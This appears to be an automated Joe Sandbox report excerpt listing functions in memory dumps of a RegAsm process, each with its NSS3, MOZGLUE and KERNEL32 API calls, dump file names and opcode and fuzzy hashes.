Uniqueness Score: -1.00%

Function 6CD9ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CD9F0AD,6CD9F150,?,6CD9F150,?,?,?), ref: 6CD9ECBA

Part of subcall function 6CDA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CD487ED,00000800,6CD3EF74,00000000), ref: 6CDA1000
Part of subcall function 6CDA0FF0: PR_NewLock.NSS3(?,00000800,6CD3EF74,00000000), ref: 6CDA1016
Part of subcall function 6CDA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CD487ED,00000008,?,00000800,6CD3EF74,00000000), ref: 6CDA102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CD9ECD1

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CD9ED02

Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CD9ED5A

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 7ea2d50ebe2bdb5d70c113a1454cdad0240fa58df559e6500a11a7cec2231c67
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: B921A1B9A007429BE700CF26D944B52B7E4BFA5348F25C219E81C87A71EBB0E595C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6CDCEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CDB7FFA,?,6CDB9767,?,8B7874C0,0000A48E), ref: 6CDCEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CDB7FFA,?,6CDB9767,?,8B7874C0,0000A48E), ref: 6CDCEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CDB7FFA,?,6CDB9767,?,8B7874C0,0000A48E), ref: 6CDCEE14

Part of subcall function 6CDA0BE0: malloc.MOZGLUE(6CD98D2D,?,00000000,?), ref: 6CDA0BF8
Part of subcall function 6CDA0BE0: TlsGetValue.KERNEL32(6CD98D2D,?,00000000,?), ref: 6CDA0C15

memcpy.VCRUNTIME140(?,?,6CDB9767,00000000,00000000,6CDB7FFA,?,6CDB9767,?,8B7874C0,0000A48E), ref: 6CDCEE33

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: e481de698ac376a1c9940c8013f6e718a29b7318ab8e5b2083bc7a584081540d
Instruction ID: 9a230d64f7b7529983a253c3de396ccb08bc61d8f86e4447a4b896dc8f23af06
Opcode Fuzzy Hash: e481de698ac376a1c9940c8013f6e718a29b7318ab8e5b2083bc7a584081540d
Instruction Fuzzy Hash: A91191F1B00706ABE7109F65DC85B06B3ACAB0439DF204535E91987E10E331E464C7E3

Uniqueness

Uniqueness Score: -1.00%

Function 6CBDB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBDB4F5
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CBDB502
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CBDB542
free.MOZGLUE(?), ref: 6CBDB578

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: ee6aea7e147b9d0d5feaf676ae925813bf80e62f81afa588dcfa3b1a443d370e
Instruction ID: 31e55e56280839a53573d637f8fe64de357868f19c047513b4b0fa7ed214edf6
Opcode Fuzzy Hash: ee6aea7e147b9d0d5feaf676ae925813bf80e62f81afa588dcfa3b1a443d370e
Instruction Fuzzy Hash: D311DF31A14B81CBD7129F29C410765B3B1FF9A31CF11E70AE84953E01EBB0B5C48791

Uniqueness

Uniqueness Score: -1.00%

Function 6CD68DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CD68DE7
EnterCriticalSection.KERNEL32 ref: 6CD68DFC
PR_Unlock.NSS3 ref: 6CD68E2D
PR_SetError.NSS3 ref: 6CD68E49

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 8d52e44a9b0f4b4dc74b3699b9b99736f28ff04ea71dd541cebdb2f050c5cdf2
Instruction ID: 77121520c5832e0b306d0d8d3eaa183b86682838e95c4bf7ba00ff31c5aaa1ad
Opcode Fuzzy Hash: 8d52e44a9b0f4b4dc74b3699b9b99736f28ff04ea71dd541cebdb2f050c5cdf2
Instruction Fuzzy Hash: E9116A71605A009FD700BF79D5882AABBF4BF46354F01492AD8889BB11EB31E894CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDEAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CDD5F17,?,?,?,?,?,?,?,?,6CDDAAD4), ref: 6CDEAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CDD5F17,?,?,?,?,?,?,?,?,6CDDAAD4), ref: 6CDEACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CDDAAD4), ref: 6CDEACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CDDAAD4), ref: 6CDEACDB

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 8dbe64b79ead6694e170194c89166f8b64d5394f53da9c07bc193f16b062c9c2
Instruction ID: 9bc41c3ed4210006af24680c8a7b540176a98b0a3bbbef8366c770fcbca4984f
Opcode Fuzzy Hash: 8dbe64b79ead6694e170194c89166f8b64d5394f53da9c07bc193f16b062c9c2
Instruction Fuzzy Hash: 980169B5701B029BE710EF29E908753BBF8BB04659B004839D85EC3A20E730F455CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CC03DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CBCF20E,?), ref: 6CC03DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CBCF20E,00000000,?), ref: 6CC03DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC03E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC03E0E

Part of subcall function 6CBFCC00: GetCurrentProcess.KERNEL32(?,?,6CBC31A7), ref: 6CBFCC0D
Part of subcall function 6CBFCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CBC31A7), ref: 6CBFCC16

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 4527c229e7d68823aae9db211d198ba62f621f2045f37f9f2cd273309542c00f
Instruction ID: a4014cac0c648f3a967e468a7cb5ecad24ae1ca057b994387d56b9e121dfb6a6
Opcode Fuzzy Hash: 4527c229e7d68823aae9db211d198ba62f621f2045f37f9f2cd273309542c00f
Instruction Fuzzy Hash: 0DF0FE716402186BE700AB54EC41DAF377DEB46628F058020FD1857741E636B95986F6

Uniqueness

Uniqueness Score: -1.00%

Function 6CDEAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CDD5D40,00000000,?,?,6CDC6AC6,6CDD639C), ref: 6CDEAC2D

Part of subcall function 6CD8ADC0: TlsGetValue.KERNEL32(?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE10
Part of subcall function 6CD8ADC0: EnterCriticalSection.KERNEL32(?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE24
Part of subcall function 6CD8ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CD6D079,00000000,00000001), ref: 6CD8AE5A
Part of subcall function 6CD8ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE6F
Part of subcall function 6CD8ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE7F
Part of subcall function 6CD8ADC0: TlsGetValue.KERNEL32(?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AEB1
Part of subcall function 6CD8ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AEC9

PK11_FreeSymKey.NSS3(?,6CDD5D40,00000000,?,?,6CDC6AC6,6CDD639C), ref: 6CDEAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CDD5D40,00000000,?,?,6CDC6AC6,6CDD639C), ref: 6CDEAC59
free.MOZGLUE(8CB6FF01,6CDC6AC6,6CDD639C,?,?,?,?,?,?,?,?,?,6CDD5D40,00000000,?,6CDDAAD4), ref: 6CDEAC62

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: c17f121c0b1fa82a043c05c3cbff74ad2260958549310c037478f2086cb053e0
Instruction ID: 9814e87091bc89f3bd4a07d1ffa083fc6c2ca8efa8bcf1565a14fe32057b4f08
Opcode Fuzzy Hash: c17f121c0b1fa82a043c05c3cbff74ad2260958549310c037478f2086cb053e0
Instruction Fuzzy Hash: C2014FB9601201DFDB00DF15E8C0B46BBB8AF48B59F188069E94D8F756E735E849CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CE5CC61
free.MOZGLUE ref: 6CE5CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CE5CC80
free.MOZGLUE(?), ref: 6CE5CC87

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 67c210419d40f45b72428a4454da4b194a106bfbd109e17a9f11b249711dafb3
Instruction ID: 115657fedfcdf365bb768ed55cad36c63b6eff64826705cf714641b8ab879cc5
Opcode Fuzzy Hash: 67c210419d40f45b72428a4454da4b194a106bfbd109e17a9f11b249711dafb3
Instruction Fuzzy Hash: FEE030767006089BCA10EFA8DC4488677BCEF4A2707150926E691C3700D231F905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC185B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC185D3

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC18725

Strings

map/set<T> too long, xrefs: 6CC18720

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 14ac393ae81d3107f7f4a3f3c8b53e2ab01b38f78e51eda27b1373a8e7957e0c
Instruction ID: ff88288ecad9bf17d02937d80363aa4ce9a0bb8dd902cd78c1a3e5001adcf104
Opcode Fuzzy Hash: 14ac393ae81d3107f7f4a3f3c8b53e2ab01b38f78e51eda27b1373a8e7957e0c
Instruction Fuzzy Hash: F8516474A08641CFD701CF1AC084E5ABBF1BF4A318F1AC28AD8595BB52D335E885CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CBCBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CBCBE8F

Strings

0, xrefs: 6CBCBE5B

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 0b4154032df004f01168e9b44e10477593330c97250c1df5e093beaf0b92c9db
Instruction ID: 0fd321daf970b3ba92cd0cb7fcc2709111347865533aa45b49c00b4932bb5fc2
Opcode Fuzzy Hash: 0b4154032df004f01168e9b44e10477593330c97250c1df5e093beaf0b92c9db
Instruction Fuzzy Hash: 0D418D71A09786CFC701CF38C481A9FBBE4EF8A348F008A1DF995A7611D73199598B93

Uniqueness

Uniqueness Score: -1.00%

Function 6CD94D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD94D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CD94DE6

Strings

%d.%d, xrefs: 6CD94DDE

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 93ce11a86366a6da7eba6af43b27d0465cab24ed06d57c198adf5429ad4ec5e7
Instruction ID: a623f060fe8754979264e0474e686dd7a00af6732a5e3f994b12833dd7b3d651
Opcode Fuzzy Hash: 93ce11a86366a6da7eba6af43b27d0465cab24ed06d57c198adf5429ad4ec5e7
Instruction Fuzzy Hash: 46310DB6D042186BEB109BA19C01BFF7778EF45308F150429ED159B7A2EB709905CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC03CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC03D19
mozalloc_abort.MOZGLUE(?), ref: 6CC03D6C

Strings

d, xrefs: 6CC03D58

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 63922f0c59fa79b2bde6a1c24ff2ba68451f794c1d603415479ce61b101e64b6
Instruction ID: b822c7cb4b7b988525ca6d3716dc4f653c96b900658baf23e4b0ae9cb98d8514
Opcode Fuzzy Hash: 63922f0c59fa79b2bde6a1c24ff2ba68451f794c1d603415479ce61b101e64b6
Instruction Fuzzy Hash: 3E11B235F1478897DB009B69D8148ADB775EF96218B498258DC499B602FB32A984C350

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CBD44B2,6CC4E21C,6CC4F7F8), ref: 6CBD473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CBD474A

Strings

GetNtLoaderAPI, xrefs: 6CBD4744

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 5498d53aa82922b3bb011840fd88e6182ae7639286f428d7f89d0fdc431020f5
Instruction ID: bb9120315c4e9d00a388eec068053c038bc93853cbc53cb24f6eed6492a9dff0
Opcode Fuzzy Hash: 5498d53aa82922b3bb011840fd88e6182ae7639286f428d7f89d0fdc431020f5
Instruction Fuzzy Hash: A401B5757002548FDF04AF69C454A1D7BF9EB9B315B05C069E905DB300DB74E8018F92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC26DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC26E22
__Init_thread_footer.LIBCMT ref: 6CC26E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC26E1D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 58ff088fa639cca0f8c814cbb759ad23b811a4667dd471c1862810dcd1ef98cb
Instruction ID: 38b8c3d0c349680af54447e3e14c6329cc0085f11c0a400c23c2fa24aa438c2f
Opcode Fuzzy Hash: 58ff088fa639cca0f8c814cbb759ad23b811a4667dd471c1862810dcd1ef98cb
Instruction Fuzzy Hash: FEF05235204680CFEB00ABE8C850AD67772A31331CF04C165C89087BA2FB64E51BCEB3

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6CBD9EEF

Strings

NaN, xrefs: 6CBD9EC1
Infinity, xrefs: 6CBD9EB7

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 7a3ad8e5f388b8cf485f5ad108bd2b3d96fd8dc5472cdbd1b333582aabfa4162
Instruction ID: 7f69169f990de89966625f2a024636a9fa20d551966143f40af1bcaf44233ecc
